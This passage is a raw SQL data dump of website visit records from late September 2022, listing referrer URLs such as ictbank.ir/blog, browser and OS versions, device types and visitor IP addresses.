(24385,'2022-09-22','http://ictbank.ir/blog','Chrome','Windows','87.0.4280.141','desktop','Unknown','','209.182.197.148','000',0,4,0),
(24386,'2022-09-22','http://ictbank.ir/blog','Chrome','OS X','105.0.0.0','desktop','Macintosh','','31.56.64.60','000',0,2,0),
(24387,'2022-09-22','http://ictbank.ir/blog','Chrome','Windows','47.0.2526.80','desktop','Unknown','','185.119.81.100','000',0,2,0),
(24388,'2022-09-22','http://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','93.158.91.249','000',0,1,0),
(24389,'2022-09-22','http://82.102.9.14:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.64.204','000',0,1,0),
(24390,'2022-09-22','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','5.236.175.43','000',0,2,0),
(24391,'2022-09-22','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.51.222','000',0,2,0),
(24392,'2022-09-22','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.34.187','000',0,1,0),
(24393,'2022-09-22','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(24394,'2022-09-22','http://www.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','193.118.55.162','000',0,2,0),
(24395,'2022-09-22','http://ictbank.ir/blog','Chrome','Windows','22.0.1216.0','desktop','Unknown','','54.146.226.89','000',0,3,0),
(24396,'2022-09-22','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.210','000',0,2,0),
(24397,'2022-09-22','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.187.64.234','000',0,1,0),
(24398,'2022-09-22','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.140','000',0,2,0),
(24399,'2022-09-22','http://ictbank.ir/blog','Chrome','Windows','87.0.4280.141','desktop','Unknown','','185.119.81.108','000',0,2,0),
(24400,'2022-09-22','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24401,'2022-09-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.6.75','000',0,1,0),
(24402,'2022-09-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.209','000',0,1,0),
(24403,'2022-09-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(24404,'2022-09-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(24405,'2022-09-22','http://ictbank.ir/blog','Firefox','Ubuntu','96.0','desktop','Unknown','','3.228.219.255','000',0,4,0),
(24406,'2022-09-22','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','185.163.109.66','000',0,2,0),
(24407,'2022-09-22','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','207.154.211.10','000',0,2,0),
(24408,'2022-09-23','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,14,0),
(24409,'2022-09-23','http://ictbank.ir/blog','Chrome','Windows','86.0.4240.183','desktop','Unknown','','185.119.81.100','000',0,4,0),
(24410,'2022-09-23','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(24411,'2022-09-23','http://82.102.9.14/blog','Firefox','Linux','73.0','desktop','Unknown','','45.55.32.85','000',0,2,0),
(24412,'2022-09-23','http://ictbank.ir/blog','Chrome','Windows','60.0.3001.71','desktop','Unknown','','3.94.193.173','000',0,2,0),
(24413,'2022-09-23','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(24414,'2022-09-23','http://ictbank.ir/blog','Chrome','Windows','10.0.648.133','desktop','Unknown','','208.80.194.126','000',0,2,0),
(24415,'2022-09-23','https://www.bing.com','Chrome','Windows','35.0.2309.372','desktop','Unknown','','167.71.199.178','000',0,1,0),
(24416,'2022-09-23','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.139','desktop','Unknown','','185.119.81.108','000',0,4,0),
(24417,'2022-09-23','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,2,0),
(24418,'2022-09-23','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.190.188','000',0,2,0),
(24419,'2022-09-23','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(24420,'2022-09-23','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.86.149.152','000',0,1,0),
(24421,'2022-09-23','http://mail.design-arena.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','173.212.224.141','000',0,2,0),
(24422,'2022-09-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','198.211.125.219','000',0,1,0),
(24423,'2022-09-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(24424,'2022-09-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(24425,'2022-09-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(24426,'2022-09-24','http://ictbank.ir/blog','Firefox','Windows','3.6.23','desktop','Unknown','','208.80.194.126','000',0,4,0),
(24427,'2022-09-24','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,18,0),
(24428,'2022-09-24','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24429,'2022-09-24','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(24430,'2022-09-24','http://ictbank.ir/blog','Chrome','Windows','81.0.4044.113','desktop','Unknown','','88.99.136.18','000',0,3,0),
(24431,'2022-09-24','http://ictbank.ir/blog','Chrome','Windows','98.0.4758.82','desktop','Unknown','','88.218.46.77','000',0,1,0),
(24432,'2022-09-24','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(24433,'2022-09-24','http://ictbank.ir/blog','Chrome','Windows','79.0.3945.130','desktop','Unknown','','185.119.81.100','000',0,2,0),
(24434,'2022-09-24','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24435,'2022-09-24','http://ictbank.ir/blog','Chrome','Linux','85.0.4183.83','desktop','Unknown','','195.123.241.30','000',0,32,0),
(24436,'2022-09-24','http://ictbank.ir/blog','Chrome','Linux','85.0.4183.83','desktop','Unknown','','195.123.240.173','000',0,9,0),
(24437,'2022-09-24','http://ictbank.ir/blog','Chrome','Windows','41.0.2226.0','desktop','Unknown','','185.119.81.108','000',0,2,0),
(24438,'2022-09-24','http://ictbank.ir/blog','Opera','Windows','36.0.2130.32','desktop','Unknown','','103.156.92.178','000',0,12,0),
(24439,'2022-09-24','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,3,0),
(24440,'2022-09-24','http://wikisonnati.com/blog','Firefox','OS X','105.0','desktop','Macintosh','','149.28.60.133','000',0,6,0),
(24441,'2022-09-24','http://ictbank.ir/blog','Chrome','Android','105.0.0.0','mobile:smart','Galaxy A42 5G','','5.115.65.59','000',0,2,0),
(24442,'2022-09-24','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','3.219.35.222','000',0,1,0),
(24443,'2022-09-24','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.231','000',0,2,0),
(24444,'2022-09-24','http://www.ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(24445,'2022-09-24','http://ictbank.ir/blog','Safari','OS X','11.0','desktop','Macintosh','','95.217.239.208','000',0,1,0),
(24446,'2022-09-24','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','18.236.164.189','000',0,1,0),
(24447,'2022-09-24','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(24448,'2022-09-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.14.171','000',0,1,0),
(24449,'2022-09-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(24450,'2022-09-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(24451,'2022-09-24','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(24452,'2022-09-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(24453,'2022-09-24','http://82.102.9.14/blog','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.47','000',0,1,0),
(24454,'2022-09-24','http://82.102.9.14/blog/','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.232','000',0,1,0),
(24455,'2022-09-25','http://ictbank.ir/blog','Chrome','Windows','14.0.835.187','desktop','Unknown','','208.80.194.122','000',0,3,0),
(24456,'2022-09-25','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24457,'2022-09-25','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,6,0),
(24458,'2022-09-25','http://ictbank.ir/blog','Chrome','Linux','85.0.4183.83','desktop','Unknown','','195.123.241.30','000',0,15,0),
(24459,'2022-09-25','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','185.142.236.41','000',0,2,0),
(24460,'2022-09-25','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.121','000',0,2,0),
(24461,'2022-09-25','http://82.102.9.14/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.198','000',0,1,0),
(24462,'2022-09-25','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','39.103.187.166','000',0,4,0),
(24463,'2022-09-25','http://ictbank.ir/blog','Chrome','OS X','50.0.2661.102','desktop','Macintosh','','217.145.224.212','000',0,1,0),
(24464,'2022-09-25','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','71.6.165.200','000',0,2,0),
(24465,'2022-09-25','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.126','000',0,3,0),
(24466,'2022-09-25','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.121','desktop','Unknown','','46.191.196.195','000',0,13,0),
(24467,'2022-09-25','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','94.102.49.193','000',0,2,0),
(24468,'2022-09-25','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(24469,'2022-09-25','http://ictbank.ir/blog','Chrome','Windows','101.0.4951.67','desktop','Unknown','','5.188.62.76','000',0,2,0),
(24470,'2022-09-25','http://ictbank.ir/blog','Firefox','OS X','105.0','desktop','Macintosh','','149.28.60.133','000',0,1,0),
(24471,'2022-09-25','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.220.255.107','000',0,1,0),
(24472,'2022-09-25','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24473,'2022-09-25','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','44.195.61.16','000',0,1,0),
(24474,'2022-09-25','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.134','000',0,2,0),
(24475,'2022-09-25','https://www.bing.com','Chrome','Windows','41.0.2225.0','desktop','Unknown','','134.122.7.10','000',0,3,0),
(24476,'2022-09-25','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','51.254.59.113','000',0,2,0),
(24477,'2022-09-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.32.144.195','000',0,1,0),
(24478,'2022-09-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.187.177','000',0,1,0),
(24479,'2022-09-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24480,'2022-09-25','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(24481,'2022-09-25','http://ictbank.ir/blog','Chrome','Linux','85.0.4183.83','desktop','Unknown','','195.123.240.173','000',0,2,0),
(24482,'2022-09-26','http://ictbank.ir/blog','Chrome','OS X','53.0.2785.143','desktop','Macintosh','','60.191.125.35','000',0,1,0),
(24483,'2022-09-26','http://ictbank.ir/blog','Chrome','Linux','85.0.4183.83','desktop','Unknown','','195.123.240.173','000',0,11,0),
(24484,'2022-09-26','http://ictbank.ir/blog','Chrome','Linux','85.0.4183.83','desktop','Unknown','','195.123.241.30','000',0,24,0),
(24485,'2022-09-26','http://ictbank.ir/blog','Firefox','Windows','7.0.1','desktop','Unknown','','208.80.194.122','000',0,5,0),
(24486,'2022-09-26','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.106','desktop','Unknown','','52.207.252.233','000',0,4,0),
(24487,'2022-09-26','http://ictbank.ir/blog','Firefox','Windows','4.1.2','desktop','Unknown','','217.146.82.142','000',0,4,0),
(24488,'2022-09-26','http://www.design-arena.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','164.68.106.210','000',0,6,0),
(24489,'2022-09-26','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','52.119.1.61','000',0,1,0),
(24490,'2022-09-26','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24491,'2022-09-26','http://baidu.com/','MIUI Browser','Android','10.1.1','mobile:smart','Mi Note 2','','180.163.220.68','000',0,1,0),
(24492,'2022-09-26','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','5.189.183.89','000',0,1,0),
(24493,'2022-09-26','http://www.gumbo.com/','Firefox','Windows','25.0','desktop','Unknown','','34.223.67.159','000',0,2,0),
(24494,'2022-09-26','http://ictbank.ir/blog','Chrome','Windows','100.0.4895.86','desktop','Unknown','','5.188.62.26','000',0,1,0),
(24495,'2022-09-26','http://ictbank.ir/blog','Firefox','Windows','91.0','desktop','Unknown','','143.110.234.18','000',0,1,0),
(24496,'2022-09-26','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(24497,'2022-09-26','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','94.102.49.193','000',0,1,0),
(24498,'2022-09-26','http://ictbank.ir/blog','Firefox','Windows','1.0.7','desktop','Unknown','','199.249.230.168','000',0,1,0),
(24499,'2022-09-26','http://ictbank.ir/blog','Firefox','Windows','1.0.7','desktop','Unknown','','185.220.103.5','000',0,1,0),
(24500,'2022-09-26','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(24501,'2022-09-26','http://ictbank.ir/blog','Safari','OS X','5.1','desktop','Macintosh','','103.156.92.178','000',0,2,0),
(24502,'2022-09-26','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.89.83.219','000',0,1,0),
(24503,'2022-09-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.187.177','000',0,1,0),
(24504,'2022-09-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.184.197','000',0,1,0),
(24505,'2022-09-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(24506,'2022-09-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(24507,'2022-09-26','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.42','000',0,2,0),
(24508,'2022-09-26','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(24509,'2022-09-26','http://www.ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(24510,'2022-09-26','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.34.187','000',0,1,0),
(24511,'2022-09-26','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.122.184','000',0,1,0),
(24512,'2022-09-27','http://ictbank.ir/blog','Firefox','Ubuntu','96.0','desktop','Unknown','','18.217.38.147','000',0,4,0),
(24513,'2022-09-27','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(24514,'2022-09-27','http://ictbank.ir/blog','Firefox','Ubuntu','3.6.13','desktop','Unknown','','208.80.194.121','000',0,2,0),
(24515,'2022-09-27','http://ictbank.ir/blog','Chrome','Linux','12.0.742.100','desktop','Unknown','','208.80.194.126','000',0,5,0),
(24516,'2022-09-27','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','65.21.206.43','000',0,1,0),
(24517,'2022-09-27','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,4,0),
(24518,'2022-09-27','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','2.185.158.1','000',0,3,0),
(24526,'2022-09-27','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(24527,'2022-09-27','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(24528,'2022-09-27','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(24529,'2022-09-27','http://www.ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(24530,'2022-09-27','http://ictbank.ir/blog','Firefox','Windows','53.0','desktop','Unknown','','184.94.240.88','000',0,2,0),
(24531,'2022-09-27','http://ictbank.ir/blog','Chrome','OS X','100.0.4896.127','desktop','Macintosh','','54.187.68.199','000',0,1,0),
(24532,'2022-09-27','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','128.199.17.104','000',0,2,0),
(24533,'2022-09-27','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','77.74.177.119','000',0,1,0),
(24534,'2022-09-27','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.34','000',0,5,0),
(24535,'2022-09-27','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.186.137.174','000',0,1,0),
(24536,'2022-09-27','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.83','000',0,1,0),
(24537,'2022-09-27','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.89','000',0,1,0),
(24538,'2022-09-27','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.45','000',0,5,0),
(24539,'2022-09-27','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','185.39.144.147','000',0,2,0),
(24540,'2022-09-27','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.31','000',0,5,0),
(24541,'2022-09-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','198.211.125.219','000',0,2,0),
(24542,'2022-09-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(24543,'2022-09-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24544,'2022-09-27','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','180.149.125.168','000',0,1,0),
(24545,'2022-09-27','http://ictbank.ir/blog','Firefox','Windows','3.6.18','desktop','Unknown','','208.80.194.122','000',0,1,0),
(24546,'2022-09-27','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.44','000',0,4,0),
(24547,'2022-09-27','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.194','000',0,2,0),
(24548,'2022-09-27','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.59','000',0,4,0),
(24549,'2022-09-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.47','000',0,7,0),
(24550,'2022-09-28','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','18.209.245.214','000',0,2,0),
(24551,'2022-09-28','http://ictbank.ir/blog','Chrome','Windows','12.0.742.91','desktop','Unknown','','208.80.194.122','000',0,2,0),
(24552,'2022-09-28','http://ictbank.ir/blog','Chrome','Windows','78.0.3904.97','desktop','Unknown','','173.252.87.113','000',0,1,0),
(24553,'2022-09-28','http://ictbank.ir/blog','Chrome','Windows','78.0.3904.97','desktop','Unknown','','173.252.87.18','000',0,1,0),
(24554,'2022-09-28','http://ictbank.ir/blog','Firefox','Windows','3.6.7','desktop','Unknown','','208.80.194.126','000',0,7,0),
(24555,'2022-09-28','http://wikisonnati.com/blog','Firefox','OS X','105.0','desktop','Macintosh','','149.28.60.133','000',0,2,0),
(24556,'2022-09-28','http://ictbank.ir/blog','Chrome','Windows','100.0.4895.86','desktop','Unknown','','5.188.62.174','000',0,1,0),
(24557,'2022-09-28','http://ictbank.ir/blog','Chrome','OS X','32.0.1664.3','desktop','Macintosh','','59.82.61.76','000',0,1,0),
(24558,'2022-09-28','http://ictbank.ir/blog','Chrome','Windows','99.0.4844.84','desktop','Unknown','','5.188.62.140','000',0,3,0),
(24559,'2022-09-28','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','65.21.206.45','000',0,2,0),
(24560,'2022-09-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.26','000',0,19,0),
(24561,'2022-09-28','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(24562,'2022-09-28','http://ictbank.ir/blog','Chrome','Windows','99.0.4844.84','desktop','Unknown','','5.188.62.26','000',0,2,0),
(24563,'2022-09-28','http://82.102.9.14/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.191','000',0,1,0),
(24564,'2022-09-28','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','51.132.231.226','000',0,1,0),
(24565,'2022-09-28','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(24566,'2022-09-28','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,7,0),
(24567,'2022-09-28','https://www.bing.com/','Edge','Windows','105.0.1343.53','desktop','Unknown','','102.176.94.4','000',0,1,0),
(24568,'2022-09-28','http://ictbank.ir/blog','Chrome','OS X','105.0.0.0','desktop','Macintosh','','2.185.138.209','000',0,2,0),
(24569,'2022-09-28','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,4,0),
(24570,'2022-09-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.27','000',0,9,0),
(24571,'2022-09-28','http://wikisonnati.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','130.255.166.120','000',0,1,0),
(24572,'2022-09-28','http://wikisonnati.ir/blog/','Firefox','Windows','103.0','desktop','Unknown','','130.255.166.80','000',0,1,0),
(24573,'2022-09-28','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','172.105.161.246','000',0,2,0),
(24574,'2022-09-28','http://ictbank.ir/blog','Chrome','Windows','98.0.4758.102','desktop','Unknown','','69.172.75.129','000',0,3,0),
(24575,'2022-09-28','http://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(24576,'2022-09-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.46','000',0,3,0),
(24577,'2022-09-28','https://www.google.com/','Firefox','Ubuntu','104.0','desktop','Unknown','','140.213.9.94','000',0,1,0),
(24578,'2022-09-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.52','000',0,7,0),
(24579,'2022-09-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.77.62.18','000',0,1,0),
(24580,'2022-09-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.209','000',0,1,0),
(24581,'2022-09-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,1,0),
(24582,'2022-09-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(24583,'2022-09-28','http://ictbank.ir/blog','Chrome','OS X','26.0.1410.65','desktop','Macintosh','','34.220.243.7','000',0,1,0),
(24584,'2022-09-28','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,2,0),
(24585,'2022-09-28','http://ictbank.ir/blog','Chrome','Windows','90.0.4430.85','desktop','Unknown','','65.21.129.153','000',0,7,0),
(24586,'2022-09-29','http://ictbank.ir/blog','Firefox','OS X','50.0','desktop','Macintosh','','176.9.8.180','000',0,9,0),
(24587,'2022-09-29','http://ictbank.ir/blog','Chrome','OS X','26.0.1410.65','desktop','Macintosh','','34.221.243.75','000',0,2,0),
(24588,'2022-09-29','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(24589,'2022-09-29','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(24590,'2022-09-29','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.106','desktop','Unknown','','52.207.252.233','000',0,4,0),
(24591,'2022-09-29','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','152.89.196.13','000',0,1,0),
(24592,'2022-09-29','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(24593,'2022-09-29','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.126','000',0,4,0),
(24594,'2022-09-29','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,3,0),
(24595,'2022-09-29','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','66.249.93.183','000',0,2,0),
(24596,'2022-09-29','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','45.247.50.169','000',0,2,0),
(24597,'2022-09-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.197','000',0,2,0),
(24598,'2022-09-29','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.157','desktop','Unknown','','51.254.199.11','000',0,1,0),
(24599,'2022-09-29','https://www.google.com/','Chrome','Windows','105.0.0.0','desktop','Unknown','','36.71.142.239','000',0,2,0),
(24600,'2022-09-29','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.220.233.233','000',0,1,0),
(24601,'2022-09-29','http://mail.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','185.180.143.16','000',0,2,0),
(24602,'2022-09-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(24603,'2022-09-29','http://ictbank.ir/blog','Firefox','Windows','52.0','desktop','Unknown','','52.172.42.170','000',0,1,0),
(24604,'2022-09-29','http://ictbank.ir/blog','Firefox','Ubuntu','24.0','desktop','Unknown','','52.172.51.19','000',0,2,0),
(24605,'2022-09-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.32.144.195','000',0,1,0),
(24606,'2022-09-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.35','000',0,1,0),
